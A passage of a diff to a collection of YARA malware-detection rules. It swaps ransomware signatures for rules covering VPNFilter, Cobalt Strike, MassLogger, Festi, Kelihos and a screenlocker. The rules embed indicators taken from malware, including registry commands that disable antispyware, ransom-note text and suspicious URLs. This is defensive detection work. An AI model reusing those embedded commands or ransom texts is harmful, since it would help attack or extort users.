??8D??????68????????50FF??85??74??8B??????39??????73??8D??????68????????50FF??85??74??83????8B??68????????E8????????83????8D????????????8B??51E8????????E8????????83????85??75??8B??????39??????73??8D??????83????8B??51E8????????E8????????83????6A??33??8D??????E8????????8D????????????50FF??????FF??????????85??0F85????????FF??????FF??????????33??435333??8D?????? } + $s1 = { 68 74 74 70 3A 2F 2F 61 70 69 2E 6D 73 77 6F 72 64 65 78 70 6C 6F 69 74 2E 63 6F 6D } + $s2 = "{\\*\\generator mswordexploit 6.3.9600}" fullword ascii condition: - uint16(0)==0x5a4d and filesize <1500KB and $pattern + uint16(0)==0x3030 and filesize <4000KB and any of them } -rule TRELLIX_ARC_Ransom_Xinof : RANSOMWARE FILE +rule TRELLIX_ARC_Vpnfilter : BACKDOOR FILE { meta: - description = "Detect Xinof ransomware" - author = "Thomas Roccia | McAfee ATR team" - id = "3b064ce4-cd5b-5a4a-bb55-a2c2c361791e" - date = "2020-11-20" - modified = "2020-11-20" - reference = "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_xinof.yar#L53-L82" + description = "Filter for 2nd stage malware used in VPNfilter attack" + author = "Christiaan Beek @ McAfee Advanced Threat Research" + id = "89bd7f94-d73c-5c5c-a3ec-0331f79e61fd" + date = "2018-05-23" + modified = "2020-08-14" + reference = "https://blog.talosintelligence.com/2018/05/VPNFilter.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_VPNfilter.yar#L1-L40" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "0c1e6299a2392239dbe7fead33ef4146" - logic_hash = "42110ee8869d56c53dc201cbc83652c6457541b8d502aa12b37ef6200e735a15" + hash = "9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387" + logic_hash = "88f08765dff632f0c08e985181309e5c3ac9cdaa51d05d8485c411fb1a183cca" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom/XINOF" + malware_type = "backdoor" + malware_family = "Backdoor:W32/VPNfilter" actor_type = "Cybercrime" - actor_group = "FONIX" + actor_group = "Unknown" strings: - $s1 = "XINOF.exe" nocase ascii - $s2 = "C:\\Users\\Phoenix" nocase ascii - $s3 = "How To Decrypt Files.hta" nocase ascii - $s4 = "C:\\ProgramData\\norunanyway" nocase ascii - $s5 = "C:\\ProgramData\\clast" nocase ascii - $s6 = "fonix1" nocase ascii - $s7 = "C:\\Windows\\System32\\shatdown.exe" nocase ascii - $s8 = "XINOF Ransomw" nocase ascii - $s9 = "XINOF v4.2" nocase ascii - $s10 = "XINOF Ransomware Version 3.3" nocase ascii + $s1 = "id-at-postalAddress" fullword ascii + $s2 = "/bin/shell" fullword ascii + $s3 = "/DZrtenNLQNiTrM9AM+vdqBpVoNq0qjU51Bx5rU2BXcFbXvI5MT9TNUhXwIDAQAB" fullword ascii + $s4 = "Usage does not match the keyUsage extension" fullword ascii + $s5 = "id-at-postalCode" fullword ascii + $s6 = "vTeY4KZMaUrveEel5tWZC94RSMKgxR6cyE1nBXyTQnDOGbfpNNgBKxyKbINWoOJU" fullword ascii + $s7 = "id-ce-extKeyUsage" fullword ascii + $s8 = "/f8wYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJBgNV" fullword ascii + $s9 = "/etc/config/hosts" fullword ascii + $s10 = "%s%-18s: %d bits" fullword ascii + $s11 = "id-ce-keyUsage" fullword ascii + $s12 = "Machine is not on the network" fullword ascii + $s13 = "No XENIX semaphores available" fullword ascii + $s14 = "No CSI structure available" fullword ascii + $s15 = "Name not unique on network" fullword ascii condition: - uint16(0)==0x5a4d and filesize <2000KB and 5 of ($s*) or TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE + ( uint16(0)==0x457f and filesize <500KB and (8 of them )) or ( all of them ) } -import "pe" - -rule TRELLIX_ARC_Megacortex_Signed : RANSOMWARE FILE +rule TRELLIX_ARC_Screenlocker_5H311_1Nj3C706 : SCREENLOCKER FILE { meta: - description = "Rule to detect MegaCortex samples digitally signed" + description = "Rule to detect the screenlocker 5h311_1nj3c706" author = "Marc Rivero | McAfee ATR Team" - id = "78a74e30-4de0-5e63-8ca5-31251c296f98" - date = "2024-09-01" + id = "50bbe8e1-4721-5277-b786-d2a2d9acf917" + date = "2018-08-07" modified = "2020-08-14" - reference = "https://blog.malwarebytes.com/detections/ransom-megacortex/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_MegaCortex.yar#L3-L26" + reference = "https://twitter.com/demonslay335/status/1038060120461266944" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_screenlocker_5h311_1nj3c706.yar#L1-L33" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "8ffced3aca837682fbd7ee68f559f73b8299cbfbe198f48124c4857680735249" + hash = "016ee638bd4fccd5ca438c2e0abddc4b070f59269c08f11c5313ba9c37190718" + logic_hash = "61b4495841c77053ba2631f087197719f3ee45cd93add022f23b87ece8563619" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" - malware_type = "ransomware" - malware_family = "Ransom:W32/MegaCortex" + tags = "SCREENLOCKER, FILE" + rule_version = "v1" + malware_type = "screenlocker" + malware_family = "ScreenLocker:W32/5h311_1nj3c706" actor_type = "Cybercrime" actor_group = "Unknown" + strings: + $s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" fullword ascii + $s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide + $s3 = "C:\\Users\\file1.txt" fullword wide + $s4 = "C:\\Users\\file2.txt" fullword wide + $s5 = "C:\\Users\\file.txt" fullword wide + $s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" fullword wide + $s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" fullword wide + $s8 = "All your file has been locked. You must pay money to have a key." fullword wide + $s9 = "After we receive Bitcoin from you. We will send key to your email." fullword wide + condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "/C=GB/L=ROMFORD/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures[i].serial=="04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" or pe.signatures[i].subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures[i].serial=="53:cc:4c:69:e5:6a:7d:bc:36:67:d5:ff:d5:24:aa:4b" or pe.signatures[i].subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" or pe.signatures[i].serial=="00:ad:72:9a:65:f1:78:47:ac:b8:f8:49:6a:76:80:ff:1e") + uint16(0)==0x5a4d and filesize <200KB and all of them } -rule TRELLIX_ARC_Ransom_Monglock : RANSOMWARE FILE +rule TRELLIX_ARC_Festi_Botnet_Pdb : BOTNET FILE { meta: - description = "Ransomware encrypting Mongo Databases " - author = "Christiaan Beek - McAfee ATR team" - id = "4350a874-dd76-5379-af9f-f1d190385706" - date = "2019-04-25" + description = "Rule to detect the Festi botnet based on PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "02f4149d-b8ac-5852-8cbe-c47f4cddcba6" + date = "2013-03-04" modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_MONGOLOCK.yar#L1-L41" + reference = "https://www.welivesecurity.com/2012/05/11/king-of-spam-festi-botnet-analysis/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_festi_botnet_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "245a7377a410828ed8bc7148f36af6d143ad20d16840238ed5b6d6f94f015984" + hash = "e55913523f5ae67593681ecb28d0fa1accee6739fdc3d52860615e1bc70dcb99" + logic_hash = "46e2576900fe94d614a683d4f09079b7ac78654079b2e558d076bcb42db4bf11" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BOTNET, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/MongLock" + malware_type = "botnet" + malware_family = "Botnet:W32/Festi" actor_type = "Cybercrime" actor_group = "Unknown" - hash5 = "c4de2d485ec862b308d00face6b98a7801ce4329a8fc10c63cf695af537194a8" strings: - $x1 = "C:\\Windows\\system32\\cmd.exe" fullword wide - $s1 = "and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! " fullword ascii - $s2 = "Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.1 BTC to our BitCoin" ascii - $s3 = "No valid port number in connect to host string (%s)" fullword ascii - $s4 = "SOCKS4%s: connecting to HTTP proxy %s port %d" fullword ascii - $s5 = "# https://curl.haxx.se/docs/http-cookies.html" fullword ascii - $s6 = "Connection closure while negotiating auth (HTTP 1.0?)" fullword ascii - $s7 = "detail may be available in the Windows System event log." fullword ascii - $s8 = "Found bundle for host %s: %p [%s]" fullword ascii - $s9 = "No valid port number in proxy string (%s)" fullword ascii - $op0 = { 50 8d 85 78 f6 ff ff 50 ff b5 70 f6 ff ff ff 15 } - $op1 = { 83 fb 01 75 45 83 7e 14 08 72 34 8b 0e 66 8b 45 } - $op2 = { c7 41 0c df ff ff ff c7 41 10 } + $pdb = "\\eclipse\\botnet\\drivers\\Bin\\i386\\kernel.pdb" condition: - ( uint16(0)==0x5a4d and filesize <2000KB and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) + uint16(0)==0x5a4d and filesize <80KB and any of them } -rule TRELLIX_ARC_Shrug2_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_MALW_Cobaltrike : BACKDOOR FILE { meta: - description = "Rule to detect the Shrug Ransomware" - author = "McAfee ATR Team" - id = "34e59296-db7c-551b-8d48-ffea20f2b4bb" - date = "2018-07-12" - modified = "2020-10-12" - reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_shrug2.yar#L1-L30" + description = "Rule to detect CobaltStrike beacon" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "a7dae4c7-672e-58fb-8542-90fa90d991a4" + date = "2020-07-19" + modified = "2021-08-30" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_cobaltstrike.yar#L1-L38" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "c89833833885bafdcfa1c6ee84d7dbcf2389b85d7282a6d5747da22138bd5c59" - logic_hash = "8c817b7fc4a0eada08b3d298c94b99a85c4e5a49a49d1c3fabdb0c6bbf56676b" + logic_hash = "fc91d40c6544c7ab7c60b3cb8fc542bd4a6fac79dbe00cad8f612854f2a6dcd1" score = 75 - quality = 20 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Shrug" + malware_type = "backdoor" + malware_family = "Backdoor:W32/CobaltStrike" actor_type = "Cybercrime" actor_group = "Unknown" + hash1 = "f47a627880bfa4a117fec8be74ab206690e5eb0e9050331292e032cd22883f5b" strings: - $s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" fullword ascii - $s2 = "http://tempacc11vl.000webhostapp.com/" fullword wide - $s3 = "Shortcut for @ShrugDecryptor@.exe" fullword wide - $s4 = "C:\\Users\\" fullword wide - $s5 = "http://clients3.google.com/generate_204" fullword wide - $s6 = "\\Desktop\\@ShrugDecryptor@.lnk" fullword wide + $pattern_0 = { e9???????? eb0a b801000000 e9???????? } + $pattern_1 = { 3bc7 750d ff15???????? 3d33270000 } + $pattern_2 = { 8bd0 e8???????? 85c0 7e0e } + $pattern_3 = { 50 8d8d24efffff 51 e8???????? } + $pattern_4 = { 03b5d4eeffff 89b5c8eeffff 3bf7 72bd 3bf7 } + $pattern_5 = { 8b450c 8945f4 8d45f4 50 } + $pattern_6 = { 33c5 8945fc 8b4508 53 56 ff750c 33db } + $pattern_7 = { e8???????? e9???????? 833d????????01 7505 e8???????? } + $pattern_8 = { 53 53 8d85f4faffff 50 } + $pattern_9 = { 68???????? 53 50 e8???????? 83c424 } + $pattern_10 = { 488b4c2420 8b0401 8b4c2408 33c8 8bc1 89442408 } + $pattern_11 = { 488d4d97 e8???????? 4c8d9c24d0000000 418bc7 498b5b20 498b7328 498b7b30 } + $pattern_12 = { bd08000000 85d2 7459 ffcf 4d85ed } + $pattern_13 = { 4183c9ff 33d2 ff15???????? 4c63c0 4983f8ff } + $pattern_14 = { 49c1e002 e8???????? 03f3 4d8d349e 3bf5 7d13 } + $pattern_15 = { 752c 4c8d45af 488d55af 488d4d27 } condition: - ( uint16(0)==0x5a4d and filesize <2000KB) and all of them + 7 of them and filesize <696320 } -rule TRELLIX_ARC_RANSOM_Suncrypt : RANSOMWARE FILE +rule TRELLIX_ARC_Masslogger_Stealer : STEALER FILE { meta: - description = "Rule to detect SunCrypt ransomware" - author = "McAfee ATR Team" - id = "92655f3e-f8e4-5c9f-ae3f-0796bd31d660" - date = "2020-10-02" - modified = "2020-11-02" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Suncrypt.yar#L1-L25" + description = "Rule to detect unpacked MassLogger stealer" + author = "Marc Rivero | McAfee ATR Team" + id = "c3a40108-3f0c-5949-9201-95c3c38b352a" + date = "2020-07-02" + modified = "2020-08-14" + reference = "https://urlhaus.abuse.ch/browse/signature/MassLogger/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_masslogger_stealer.yar#L1-L63" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "9f27c6c5bfe0d01ed517d55687bf699814679488f95ce4942306f09f39e29d85" + hash = "343873155b6950386f7d9bcd8d2b2e81088521aedf8ff1333d20229426d8145c" + logic_hash = "476b3f3a54a4616058a2aef01adbe429a38eacc8ee58881d31bd28e795a27575" score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" + quality = 66 + tags = "STEALER, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransomware:W32/Suncrypt" + malware_type = "stealer" + malware_family = "Stealer:W32/MassLogger" actor_type = "Cybercrime" actor_group = "Unknown" - hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80" - hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806" strings: - $pattern = { 77??2F475263????78??58436463????77??7A??5263????78??5846534D5A4678??48475263??????6B??????4D5A4679??7A??5263????78??584C5163????7A??44475264??5778??58526163????30????475264??30????58556463????31????475264??73??6B??????63????32????4752646C73??6B??????38????32??5047526477??6A??5738????68????????41555039????496C46374931????46446F62????414146442F565169????????????5039????466D4A526669??????????64??63????4F6D38????414169??????????586F69??????????33????30????69????????????6F41444141414974??38????41554542516167??2F5665??4478??434A526679??6666????64??63????4F6D444141414169??????????33??69????????????77??33????2F33????2F33????36??49464141434478??7A??64667A??64??7A??64??6A??73??7A??2F34??454449584164??517A??4F74??69??????????5834??5558672F33????2F33????36??6E362F2F39????59584164??517A??4F73??69??????????33??69????????????554B30????69????????????30????5838????5830????5549554974??4446434C525268????????30??39????77??444A77??574C37495073??4D5A4634??62????65??70??6B??????73??4634??54475265??31????586C5963????35????????65????78??586F63????4636??2F47526570??78??5872??63????37475047526531??78??5875??4931????46446F534163????46442F565169????????????66??51616B??????52434C51416A??63????4C5252442F63????2F566679??78??434677??55454D38??????475368????????41496C462B????462B????4E454974??49496C49434974??454974??434974??454974??49414E494B496C4E39????4639????517A??5041514D6E44565976??555974??434974??434974??434974??494474??4E4855464D38????367A??4C525169??????????????6C72??51574466??68????????454D38??????6F74??434974??434974??434974??494374??4E496C4E2F5039??2F4974??435039????4F6A??2B????2F57566E4A77??574C37494873??41414141494E6C6C4143445A6141416733??514148554969??????????30??????44475266??75??6B??????4D5A4638????475266??73??6B??????4D5A4639????475266??6B??????33????5A462B????4752666B??????5867??73??4634??6E475265??79??6B??????4D5A4635????????65??68????????62????4635????????65??????????70??63????366E4C47526574??78??5873??4D5A4630????475264??70??6B??????73??4630??54475264??31????58565963????31????475264????78??585962????4632????47526470??78??5862????5A4633????475262????78??5739????5A4676??54475262??4478??58416463????77??4C475263????78??58445A63????78??37475263????78??5847554D5A4678??4C475263????78??584A5938????79??58475263??????6B??????38????7A??44475261526178??576C64??????70??584752616475??6B??????63????71??4847526170??78??5772??73??4672??6E47526131??????5775??38????72??2F475262????78??5778??38????73??58475262????78??5730??????4674??6E475262????78??5733????5A4675??434E5265??5136??4D46414142512F31????69????????????51554F677A??514141555039????496C466E4931????46446F4977??414146442F565169????????????6152516A??5877??5039????46442F565169????????????52434C514269????????????4932????502F2F2F31??????667A??565A434677??515A67??32????414142414855433677??4C526677??68????????2F2B????667A??31????46454974??434974??454974??4E4474??47484A4D69??????????414969??????????5838????36??6661414164??69??????????????6A??565978??2F31????68????????32????61414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C4249476F4561414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C42494974??45494E34??414231????74??454974??43476F49575776??42594E38????77??64??474C5252434C514169??????????????534A51534472??476F4561414177??41434C5252434C514169??????????????6F412F31????67??????69??????????456769??????????67????48554636??67??4141434C5252434C51416A??63????4C5252442F63????4C5252442F63????6F30????4141495045444974??454974??434974??454974??43412B??5352534E524167??69????????????38????73??69??????????6C462F4974??454974??43412B??51415935????????4F5774??2F4369??????????????45516130????4B4974??454974??454974??6D414E4D4168????????5838????74??454974??494974??6D414E4D416778??36??59424141434478??7A??73??64??6C4145414141417A??412B????50372F2F34??466C4D6E44565976??555974??434974??434974??45496C49424974??434974??42412B??414431????67??4164??517A??4F73??69??????????414569??????????6B??????67??????554969????????????4969??????????68????????4164??517A?? } + $pattern_0 = { 6437 3e2585829c88 ec ec 1bc8 } + $pattern_1 = { d7 b9513e1ba7 195ab6 e6df 7e2a 5a b6cc } + $pattern_2 = { 80aee281aae280 8ee2 808ce2808ee2808e e280 ae 00436f 6e } + $pattern_3 = { 6d e586 4c 40 } + $pattern_4 = { e281 ab e280 8ee2 80aee281aae280 8ee2 } + $pattern_5 = { 6c 69636b65644576 656e 7441 7267 7300 } + $pattern_6 = { 6e 7e81 d86aaf 61 93 7c2b 832b62 } + $pattern_7 = { 8b1c87 e7ed 24a2 3218 73df 53 } + $pattern_8 = { ee 9a357f9a475399 3188eef97d50 3f ef c9 } + $pattern_9 = { 44 a2???????? 92 7526 42 208fb5ca7050 } + $pattern_10 = { f2bbafb0d5f8 d524 0d48c906ba 7977 5d } + $pattern_11 = { 748f 46 4e 49 2af2 ee 9a357f9a475399 } + $pattern_12 = { 237ddb e200 95 46 99 37 } + $pattern_13 = { d9ae1d19ec3b 01db c5615c ec } + $pattern_14 = { 304a8a e2f4 bde7a84f79 c038d3 197ceae6 } + $pattern_15 = { 291f ff84c3bd55d8dc f331f2 1a3a 9c 7d78 } + $pattern_16 = { 3f 7af1 77a2 24ae 7ff3 } + $pattern_17 = { d1655d 7236 3873c1 b59e } + $pattern_18 = { 2aff 95 55 28ff 94 53 } + $pattern_19 = { e6b1 43 08d2 ef 43 3c38 } + $pattern_20 = { 6964427275736800 43 6f 6c 6f 7200 e281 } + $pattern_21 = { 37 005400a7 877f08 54 00e1 875303 5c } + $pattern_22 = { 6a45 e42c d3ba76c4f058 ce 3037 } + $pattern_23 = { b59e 59 f1 f1 } + $pattern_24 = { 7988 cd09 91 0099664e0391 008288490061 008c88d3099900 } + $pattern_25 = { 1e e3c2 00ff 698876be8fb365b13eb7 45 } + $pattern_26 = { 3d4c9deadf 57 ddeb 97 } + $pattern_27 = { e280 8ee2 808ee281aee280 8ee2 81ace281ace280ade280ab e281 } + $pattern_28 = { 4d 9c 8e5753 32414f d28a7173e2c4 7ee4 d9ae1d19ec3b } + $pattern_29 = { 7472 69704d656e755f 53 61 } + $pattern_30 = { 79bc fa ad 49 } + $pattern_31 = { 875303 5c 00140a 37 005c00a7 } + $pattern_32 = { 7265 5f 43 6c 69636b00746f6f 6c 53 } + $pattern_33 = { 36e633 2b2b 3673d1 d480 124d2d } + $pattern_34 = { 19b3e7ab29db 51 e1f3 dd3a 266f b884c4b53b } + $pattern_35 = { 7467 43 f332d2 84bf3df2e66b 4a ba5a20d9f5 3dbf2a3753 } + $pattern_36 = { f271f3 8877f7 a8e5 6437 3e2585829c88 } + $pattern_37 = { ce 84604c 3f 8cc6 56 bf165fdec5 4a } + $pattern_38 = { ad 49 a2???????? 4c e15b 8b1c87 } + $pattern_39 = { 3400 b687 bc083c00cd 87ce 083400 } condition: - uint16(0)==0x6441 and all of them + 7 of them and filesize <3834880 } -rule TRELLIX_ARC_RANSOM_Suncrypt_Decryptor : RANSOMWARE FILE +rule TRELLIX_ARC_Kelihos_Botnet_Pdb : BOTNET FILE { meta: - description = "Rule to detect SunCrypt ransomware decryptor" - author = "McAfee ATR Team" - id = "ec0d3811-6083-5537-bf29-32ee02d43b5e" - date = "2020-10-02" - modified = "2020-11-02" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Suncrypt.yar#L27-L50" + description = "Rule to detect Kelihos malware based on PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "2b6683a1-ba19-586b-8a92-89d4764efa12" + date = "2013-09-04" + modified = "2020-08-14" + reference = "https://www.malwaretech.com/2017/04/the-kelihos-botnet.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_kelhios_botnet_pdb.yar#L1-L26" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "59d1193bb0f8d3983a181394b5dd5247470d9e118cc4fe0674167f162bcdb6e1" + hash = "f0a6d09b5f6dbe93a4cf02e120a846073da2afb09604b7c9c12b2e162dfe7090" + logic_hash = "f60fb85161f86653f390b444d568da24cf07b3be99856230156741e8451e2a3f" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BOTNET, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransomware:W32/Suncrypt" + malware_type = "botnet" + malware_family = "Botnet:W32/Kelihos" actor_type = "Cybercrime" actor_group = "Unknown" - hash1 = "a0f99367b0a0a358ed6e5ae25904016d02aef6aa7c0423c34aa3ec3fd6354310" strings: - $pattern = { 558BEC81EC88000000837D08008BC10F101A89957CFFFFFF0F104A10898578FFFFFF0F1062200F106A300F115D940F114DA40F1165B40F116DC40F8E340200008B45D08B4DC48B55B08945F88B45CC8945E08B45C88945E88B45C08945F08B45BC8945F48B45B8538B5DA88945EC8B45AC568B75A48945D48B45A0578975DC8945E48B459403C68BF033F18B4DB4C1C61003CE8BF9337DDCC1C70C03C78945DC33C6C1C0088945D803C18B4DEC89458833C7C1C0078945848B459803C38BF03375E8C1C61003CE8BF933FBC1C70C03C78945E833C6C1C00889458C03C18B4DF48BD88945EC33DF8B459C0345D48B7DE48BF03375E003FAC1C61003CEC1C307894DF4334DD4C1C10C03C133F08945908B45F0C1C6088975800375F433CEC1C107894DE08B4DF833CFC1C11003C133D08945F0C1C20C8D043A8B7DF033C88945E48B45DCC1C10803F9894DF833D7C1C20703C38BC8334DF8C1C11003F18975FC315DFC8B5DFCC1C30C03C389459433C1C1C0088945F88945D003C633D88945F48945BC8B45E80345E08BC8C1C307334DD8C1C110895DFC895DA88B5DEC8D340F8BFE337DE0C1C70C03C789459833C1C1C0088945D88945C403C68B758833F88945F08945C08B459003C2C1C7078BC8897DD4334D8CC1C11003F1897DAC8B7DE433D6037D84C1C20C03C289459C33C1C1C0088945E88945C803C633D08945B48BC7C1C207334580C1C01003D88BCB334D84C1C10C03F98BF7897DE433F0897DA0C1C60803DE8975E08975CC895DEC8B45088BF333F1895DB88B5DFC488B4DD8C1C6078975DC8975A489450885C00F8F30FEFFFF0F106DC48B8578FFFFFF0F1065B45F0F105D948955B00F104DA48B957CFFFFFF5E5B0F10020F105210660FFED80F104230660FFED10F104A200F1118660FFECC660FFEC50F1150100F1148200F1140308BE55DC3CCCCCCCCCCCCCCCCCCCC558BEC83E4F081EC58020000568BC18B4D1489442420578BFA897C24283D000100000F82680A0000660F6E07660F70C800660F6E4704660F70D000660F6E4708660F70D800660F6E470C660F70E000660F6E4710660F70E800660F6E47148B7508660F70F000660F6E47188B550C660F70F8008D8EC0000000660F6E471C660F70C0000F29842430010000660F6E4720660F70C0000F29842440010000660F6E4724660F70C0000F29842450010000660F6E4728660F70C0000F29842460010000660F6E472C894C240C8D8AC0000000660F70C000894C241C8D8E800000000F29842470010000660F6E4738894C24148D8A80000000660F70C000894C24188D4E400F29842480010000660F6E473C894C242C8D4A40660F70C000C1E8080F298C24A00100000F299424B00100000F299C24C00100000F29A424D00100000F29AC24E00100000F29B424F00100000F29BC24000200000F29842490010000894C24108944242066660F1F8400000000000F2884243001000033C00B47308B4F340F298424800000000F288424400100000F298424900000000F288424500100000F294424600F288424600100000F298424100100000F28842470010000894C244C8944244883C0040F298C24D0000000F30F7E4C244883D1000F298424200100000F288424900100000F299424E00000000F2815A02B4200660F6CC90F29442430660FD4D10F2805B02B42000F29A424A0000000660FD4C10F28E20F29B42400010000660F62E0660F6AD00F28F40F299C24F00000000F28DD0F28AC2480010000660F62F20F297C24700F28FE660F6AE2894F348B4D140F295C24500F29AC24C00000000F29A424B00000000F29BC24400200000F29A4245002000089473085C90F84820400000F287C24708BC166900F28D3660FFE9424D0000000660FEFF2660F380035C02B42000F28DE660FFE9C24900000000F28C3660FEF4424500F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942400010000660FFE9424E0000000660FEFF0660F380035D02B42000F29842490000000660FEFE2660F380025C02B42000F28C60F29742470660FFEC30F28DC660FFE5C24600F29842410020000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424000100000F298C24200200000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D7660FFE9424F0000000660FEFE0660F380025D02B42000F29442460660FEFEA660F38002DC02B42000F28C40F29A424B0000000660FFEC30F28DD660FFE9C24100100000F29842430020000660FEFC10F28F0660F72F007660F72D619660FEBF00F28C3660FEFC70F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FFE9424A0000000660FEFE8660F38002DD02B42000F294424500F28E50F29AC24C0000000660FFEE30F28C4660FEFC10F28F8660F72F007660F72D719660FEBF80F286C2430660FEFEA660F38002DC02B42000F28DD660FFE9C24200100000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D6660FEFE8660FFE942490000000660F38002DD02B42000F298424A00000000F296C2430660FFEEB0F28C5660FEFC10F28C8660F72F007660F72D119660FEBC80F28442430660FEFC20F298C2480000000660F380005C02B42000F28D80F29442430660FFEDC0F28C3660FEFC60F287424700F28C8660F72F00C660F72D114660FEBC80F284424300F28E1660FFEE20F28D7660FFE542460660FEFC4660F380005D02B4200660FEFF20F29A424D0000000660F380035C02B42000F29442430660FFEC30F298424100100000F28DE660FEFC1660FFEDD0F28C8660F72F007660F72D119660FEBC80F28C3660FEFC70F298C24000100000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FEFF00F298424E0000000660F380035D02B42000F28C6660FFEC30F29842420010000660FEFC10F28F8660F72F007660F72D719660FEBF8660FFE5424500F28A424B00000000F28AC24C0000000660FEFE2660F380025C02B42000F28DC660FFE9C24100200000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942420020000660FFE9424A0000000660FEFE00F298424F0000000660FEFEA660F380025D02B4200660F38002DC02B42000F29A424B00000000F28C4660FFEC30F28DD660FFE9C24300200000F29842490000000660FEFC10F28C8660F72F007660F72D119660FEBC